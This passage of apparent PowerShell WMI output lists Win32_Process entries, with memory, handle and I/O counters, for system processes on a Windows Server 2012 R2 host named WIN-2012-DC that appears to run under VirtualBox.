0\nQuotaPeakPagedPoolUsage : 0\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 0\nVirtualSize : 65536\nWindowsVersion : 6.3.9600\nWorkingSetSize : 4096\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : System Idle Process\nHandles : 0\nVM : 65536\nWS : 4096\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"4\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"4\"\nCaption : System\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate : 20170712121425.018613-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : System\nExecutablePath :\nExecutionState :\nHandle : 4\nHandleCount : 805\nInstallDate :\nKernelModeTime : 479687500\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : System\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 3466\nOtherTransferCount : 152451\nPageFaults : 4798\nPageFileUsage : 112\nParentProcessId : 0\nPeakPageFileUsage : 276\nPeakVirtualSize : 7389184\nPeakWorkingSetSize : 1716\nPriority : 8\nPrivatePageCount : 114688\nProcessId : 4\nQuotaNonPagedPoolUsage : 0\nQuotaPagedPoolUsage : 0\nQuotaPeakNonPagedPoolUsage : 0\nQuotaPeakPagedPoolUsage : 0\nReadOperationCount : 195\nReadTransferCount : 53093300\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 75\nUserModeTime : 0\nVirtualSize : 3432448\nWindowsVersion : 6.3.9600\nWorkingSetSize : 139264\nWriteOperationCount : 13174\nWriteTransferCount : 207929144\nPSComputerName : WIN-2012-DC\nProcessName : System\nHandles : 805\nVM : 3432448\nWS : 139264\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"208\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"208\"\nCaption : smss.exe\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate : 20170712121425.018613-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : smss.exe\nExecutablePath :\nExecutionState :\nHandle : 208\nHandleCount : 52\nInstallDate :\nKernelModeTime : 156250\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : smss.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 266\nOtherTransferCount : 31584\nPageFaults : 595\nPageFileUsage : 276\nParentProcessId : 4\nPeakPageFileUsage : 336\nPeakVirtualSize : 25382912\nPeakWorkingSetSize : 1032\nPriority : 11\nPrivatePageCount : 282624\nProcessId : 208\nQuotaNonPagedPoolUsage : 3\nQuotaPagedPoolUsage : 13\nQuotaPeakNonPagedPoolUsage : 7\nQuotaPeakPagedPoolUsage : 53\nReadOperationCount : 4\nReadTransferCount : 29188\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 0\nVirtualSize : 4317184\nWindowsVersion : 6.3.9600\nWorkingSetSize : 217088\nWriteOperationCount : 1\nWriteTransferCount : 32\nPSComputerName : WIN-2012-DC\nProcessName : smss.exe\nHandles : 52\nVM : 4317184\nWS : 217088\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"292\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"292\"\nCaption : csrss.exe\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate : 20170712121426.081561-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : csrss.exe\nExecutablePath :\nExecutionState :\nHandle : 292\nHandleCount : 171\nInstallDate :\nKernelModeTime : 5000000\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : csrss.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 14627\nOtherTransferCount : 839996\nPageFaults : 2988\nPageFileUsage : 1552\nParentProcessId : 284\nPeakPageFileUsage : 1552\nPeakVirtualSize : 45264896\nPeakWorkingSetSize : 3352\nPriority : 13\nPrivatePageCount : 1589248\nProcessId : 292\nQuotaNonPagedPoolUsage : 11\nQuotaPagedPoolUsage : 114\nQuotaPeakNonPagedPoolUsage : 13\nQuotaPeakPagedPoolUsage : 122\nReadOperationCount : 64\nReadTransferCount : 55340\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 8\nUserModeTime : 781250\nVirtualSize : 44208128\nWindowsVersion : 6.3.9600\nWorkingSetSize : 1372160\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : csrss.exe\nHandles : 171\nVM : 44208128\nWS : 1372160\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"344\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"344\"\nCaption : csrss.exe\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate : 20170712121426.456426-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : csrss.exe\nExecutablePath :\nExecutionState :\nHandle : 344\nHandleCount : 185\nInstallDate :\nKernelModeTime : 3906250\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : csrss.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 3146\nOtherTransferCount : 69640\nPageFaults : 65653\nPageFileUsage : 1496\nParentProcessId : 336\nPeakPageFileUsage : 1552\nPeakVirtualSize : 85655552\nPeakWorkingSetSize : 35324\nPriority : 13\nPrivatePageCount : 1531904\nProcessId : 344\nQuotaNonPagedPoolUsage : 16\nQuotaPagedPoolUsage : 162\nQuotaPeakNonPagedPoolUsage : 17\nQuotaPeakPagedPoolUsage : 192\nReadOperationCount : 34150\nReadTransferCount : 1055474\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 10\nUserModeTime : 312500\nVirtualSize : 71057408\nWindowsVersion : 6.3.9600\nWorkingSetSize : 23605248\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : csrss.exe\nHandles : 185\nVM : 71057408\nWS : 23605248\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"352\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"352\"\nCaption : wininit.exe\nCommandLine : wininit.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121426.456426-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : wininit.exe\nExecutablePath : C:\\Windows\\system32\\wininit.exe\nExecutionState :\nHandle : 352\nHandleCount : 79\nInstallDate :\nKernelModeTime : 312500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : wininit.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1036\nOtherTransferCount : 2788\nPageFaults : 1112\nPageFileUsage : 728\nParentProcessId : 284\nPeakPageFileUsage : 956\nPeakVirtualSize : 45092864\nPeakWorkingSetSize : 3524\nPriority : 13\nPrivatePageCount : 745472\nProcessId : 352\nQuotaNonPagedPoolUsage : 8\nQuotaPagedPoolUsage : 88\nQuotaPeakNonPagedPoolUsage : 10\nQuotaPeakPagedPoolUsage : 90\nReadOperationCount : 1\nReadTransferCount : 6656\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 156250\nVirtualSize : 41603072\nWindowsVersion : 6.3.9600\nWorkingSetSize : 294912\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : wininit.exe\nHandles : 79\nVM : 41603072\nWS : 294912\nPath : C:\\Windows\\system32\\wininit.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"380\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"380\"\nCaption : winlogon.exe\nCommandLine : winlogon.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121426.472426-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : winlogon.exe\nExecutablePath : C:\\Windows\\system32\\winlogon.exe\nExecutionState :\nHandle : 380\nHandleCount : 156\nInstallDate :\nKernelModeTime : 937500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : winlogon.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1216\nOtherTransferCount : 145120\nPageFaults : 10679\nPageFileUsage : 1216\nParentProcessId : 336\nPeakPageFileUsage : 2624\nPeakVirtualSize : 59760640\nPeakWorkingSetSize : 8728\nPriority : 13\nPrivatePageCount : 1245184\nProcessId : 380\nQuotaNonPagedPoolUsage : 9\nQuotaPagedPoolUsage : 117\nQuotaPeakNonPagedPoolUsage : 14\nQuotaPeakPagedPoolUsage : 117\nReadOperationCount : 3\nReadTransferCount : 144816\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 0\nVirtualSize : 58621952\nWindowsVersion : 6.3.9600\nWorkingSetSize : 8900608\nWriteOperationCount : 1\nWriteTransferCount : 160\nPSComputerName : WIN-2012-DC\nProcessName : winlogon.exe\nHandles : 156\nVM : 58621952\nWS : 8900608\nPath : C:\\Windows\\system32\\winlogon.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"440\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"440\"\nCaption : services.exe\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate : 20170712121426.721992-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : services.exe\nExecutablePath :\nExecutionState :\nHandle : 440\nHandleCount : 220\nInstallDate :\nKernelModeTime : 2187500\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : services.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 2992\nOtherTransferCount : 66586\nPageFaults : 4283\nPageFileUsage : 2160\nParentProcessId : 352\nPeakPageFileUsage : 2920\nPeakVirtualSize : 29523968\nPeakWorkingSetSize : 5740\nPriority : 9\nPrivatePageCount : 2211840\nProcessId : 440\nQuotaNonPagedPoolUsage : 10\nQuotaPagedPoolUsage : 91\nQuotaPeakNonPagedPoolUsage : 17\nQuotaPeakPagedPoolUsage : 92\nReadOperationCount : 6\nReadTransferCount : 243828\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 4\nUserModeTime : 2343750\nVirtualSize : 21508096\nWindowsVersion : 6.3.9600\nWorkingSetSize : 2916352\nWriteOperationCount : 1\nWriteTransferCount : 160\nPSComputerName : WIN-2012-DC\nProcessName : services.exe\nHandles : 220\nVM : 21508096\nWS : 2916352\nPath :\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"448\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"448\"\nCaption : lsass.exe\nCommandLine : C:\\Windows\\system32\\lsass.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121426.768868-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : lsass.exe\nExecutablePath : C:\\Windows\\system32\\lsass.exe\nExecutionState :\nHandle : 448\nHandleCount : 1280\nInstallDate :\nKernelModeTime : 72343750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : lsass.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 52553\nOtherTransferCount : 4821854\nPageFaults : 40173\nPageFileUsage : 37732\nParentProcessId : 352\nPeakPageFileUsage : 64580\nPeakVirtualSize : 1225867264\nPeakWorkingSetSize : 66640\nPriority : 9\nPrivatePageCount : 38637568\nProcessId : 448\nQuotaNonPagedPoolUsage : 123\nQuotaPagedPoolUsage : 182\nQuotaPeakNonPagedPoolUsage : 148\nQuotaPeakPagedPoolUsage : 187\nReadOperationCount : 8959\nReadTransferCount : 81985973\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 27\nUserModeTime : 46875000\nVirtualSize : 1202966528\nWindowsVersion : 6.3.9600\nWorkingSetSize : 28327936\nWriteOperationCount : 1541\nWriteTransferCount : 2072357\nPSComputerName : WIN-2012-DC\nProcessName : lsass.exe\nHandles : 1280\nVM : 1202966528\nWS : 28327936\nPath : C:\\Windows\\system32\\lsass.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"572\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"572\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k DcomLaunch\nCreationClassName : Win32_Process\nCreationDate : 20170712121428.268496-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 572\nHandleCount : 364\nInstallDate :\nKernelModeTime : 1562500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 533\nOtherTransferCount : 22364\nPageFaults : 5554\nPageFileUsage : 3372\nParentProcessId : 440\nPeakPageFileUsage : 8228\nPeakVirtualSize : 50991104\nPeakWorkingSetSize : 12264\nPriority : 8\nPrivatePageCount : 3452928\nProcessId : 572\nQuotaNonPagedPoolUsage : 15\nQuotaPagedPoolUsage : 174\nQuotaPeakNonPagedPoolUsage : 20\nQuotaPeakPagedPoolUsage : 174\nReadOperationCount : 2\nReadTransferCount : 4608\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 8\nUserModeTime : 1250000\nVirtualSize : 47263744\nWindowsVersion : 6.3.9600\nWorkingSetSize : 7065600\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 364\nVM : 47263744\nWS : 7065600\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"600\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"600\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k RPCSS\nCreationClassName : Win32_Process\nCreationDate : 20170712121428.502822-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 600\nHandleCount : 333\nInstallDate :\nKernelModeTime : 6562500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1702\nOtherTransferCount : 82954\nPageFaults : 5020\nPageFileUsage : 3080\nParentProcessId : 440\nPeakPageFileUsage : 4380\nPeakVirtualSize : 32124928\nPeakWorkingSetSize : 7540\nPriority : 8\nPrivatePageCount : 3153920\nProcessId : 600\nQuotaNonPagedPoolUsage : 18\nQuotaPagedPoolUsage : 71\nQuotaPeakNonPagedPoolUsage : 26\nQuotaPeakPagedPoolUsage : 72\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 7\nUserModeTime : 10781250\nVirtualSize : 27353088\nWindowsVersion : 6.3.9600\nWorkingSetSize : 3796992\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 333\nVM : 27353088\nWS : 3796992\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"716\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"716\"\nCaption : dwm.exe\nCommandLine : \"dwm.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712121428.721530-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : dwm.exe\nExecutablePath : C:\\Windows\\system32\\dwm.exe\nExecutionState :\nHandle : 716\nHandleCount : 174\nInstallDate :\nKernelModeTime : 6718750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : dwm.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 276\nOtherTransferCount : 1874\nPageFaults : 141908\nPageFileUsage : 25232\nParentProcessId : 380\nPeakPageFileUsage : 29976\nPeakVirtualSize : 151556096\nPeakWorkingSetSize : 64424\nPriority : 13\nPrivatePageCount : 25837568\nProcessId : 716\nQuotaNonPagedPoolUsage : 18\nQuotaPagedPoolUsage : 248\nQuotaPeakNonPagedPoolUsage : 21\nQuotaPeakPagedPoolUsage : 285\nReadOperationCount : 1\nReadTransferCount : 60\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 7\nUserModeTime : 7343750\nVirtualSize : 135208960\nWindowsVersion : 6.3.9600\nWorkingSetSize : 48881664\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : dwm.exe\nHandles : 174\nVM : 135208960\nWS : 48881664\nPath : C:\\Windows\\system32\\dwm.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"744\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"744\"\nCaption : VBoxService.exe\nCommandLine : C:\\Windows\\System32\\VBoxService.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121428.800220-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : VBoxService.exe\nExecutablePath : C:\\Windows\\System32\\VBoxService.exe\nExecutionState :\nHandle : 744\nHandleCount : 138\nInstallDate :\nKernelModeTime : 3750000\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : VBoxService.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 465654\nOtherTransferCount : 12640194\nPageFaults : 84135\nPageFileUsage : 1912\nParentProcessId : 440\nPeakPageFileUsage : 1972\nPeakVirtualSize : 60723200\nPeakWorkingSetSize : 4924\nPriority : 8\nPrivatePageCount : 1957888\nProcessId : 744\nQuotaNonPagedPoolUsage : 10\nQuotaPagedPoolUsage : 98\nQuotaPeakNonPagedPoolUsage : 11\nQuotaPeakPagedPoolUsage : 99\nReadOperationCount : 2295\nReadTransferCount : 9180\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 10\nUserModeTime : 1093750\nVirtualSize : 59535360\nWindowsVersion : 6.3.9600\nWorkingSetSize : 2842624\nWriteOperationCount : 2295\nWriteTransferCount : 36720\nPSComputerName : WIN-2012-DC\nProcessName : VBoxService.exe\nHandles : 138\nVM : 59535360\nWS : 2842624\nPath : C:\\Windows\\System32\\VBoxService.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"828\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"828\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted\nCreationClassName : Win32_Process\nCreationDate : 20170712121428.974985-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\System32\\svchost.exe\nExecutionState :\nHandle : 828\nHandleCount : 454\nInstallDate :\nKernelModeTime : 2656250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 11449\nOtherTransferCount : 278936\nPageFaults : 15593\nPageFileUsage : 11600\nParentProcessId : 440\nPeakPageFileUsage : 12628\nPeakVirtualSize : 417185792\nPeakWorkingSetSize : 18704\nPriority : 8\nPrivatePageCount : 11878400\nProcessId : 828\nQuotaNonPagedPoolUsage : 20\nQuotaPagedPoolUsage : 99\nQuotaPeakNonPagedPoolUsage : 90\nQuotaPeakPagedPoolUsage : 775\nReadOperationCount : 630\nReadTransferCount : 20226304\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 12\nUserModeTime : 4062500\nVirtualSize : 61456384\nWindowsVersion : 6.3.9600\nWorkingSetSize : 10960896\nWriteOperationCount : 1981\nWriteTransferCount : 24967416\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 454\nVM : 61456384\nWS : 10960896\nPath : C:\\Windows\\System32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"868\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"868\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k netsvcs\nCreationClassName : Win32_Process\nCreationDate : 20170712121429.077424-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 868\nHandleCount : 1475\nInstallDate :\nKernelModeTime : 1416875000\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 16234650\nOtherTransferCount : 4483847620\nPageFaults : 7101408\nPageFileUsage : 32672\nParentProcessId : 440\nPeakPageFileUsage : 529172\nPeakVirtualSize : 1013297152\nPeakWorkingSetSize : 503340\nPriority : 8\nPrivatePageCount : 33456128\nProcessId : 868\nQuotaNonPagedPoolUsage : 55\nQuotaPagedPoolUsage : 310\nQuotaPeakNonPagedPoolUsage : 1411\nQuotaPeakPagedPoolUsage : 545\nReadOperationCount : 636061\nReadTransferCount : 4894774184\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 36\nUserModeTime : 2436875000\nVirtualSize : 701538304\nWindowsVersion : 6.3.9600\nWorkingSetSize : 32976896\nWriteOperationCount : 66929\nWriteTransferCount : 6173153501\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 1475\nVM : 701538304\nWS : 32976896\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"916\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"916\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k LocalService\nCreationClassName : Win32_Process\nCreationDate : 20170712121429.146469-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 916\nHandleCount : 476\nInstallDate :\nKernelModeTime : 937500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 8412\nOtherTransferCount : 477118\nPageFaults : 5256\nPageFileUsage : 4960\nParentProcessId : 440\nPeakPageFileUsage : 5688\nPeakVirtualSize : 86732800\nPeakWorkingSetSize : 10468\nPriority : 8\nPrivatePageCount : 5079040\nProcessId : 916\nQuotaNonPagedPoolUsage : 26\nQuotaPagedPoolUsage : 176\nQuotaPeakNonPagedPoolUsage : 31\nQuotaPeakPagedPoolUsage : 180\nReadOperationCount : 58\nReadTransferCount : 7882\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 17\nUserModeTime : 2500000\nVirtualSize : 82997248\nWindowsVersion : 6.3.9600\nWorkingSetSize : 7589888\nWriteOperationCount : 13\nWriteTransferCount : 1156\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 476\nVM : 82997248\nWS : 7589888\nPath : 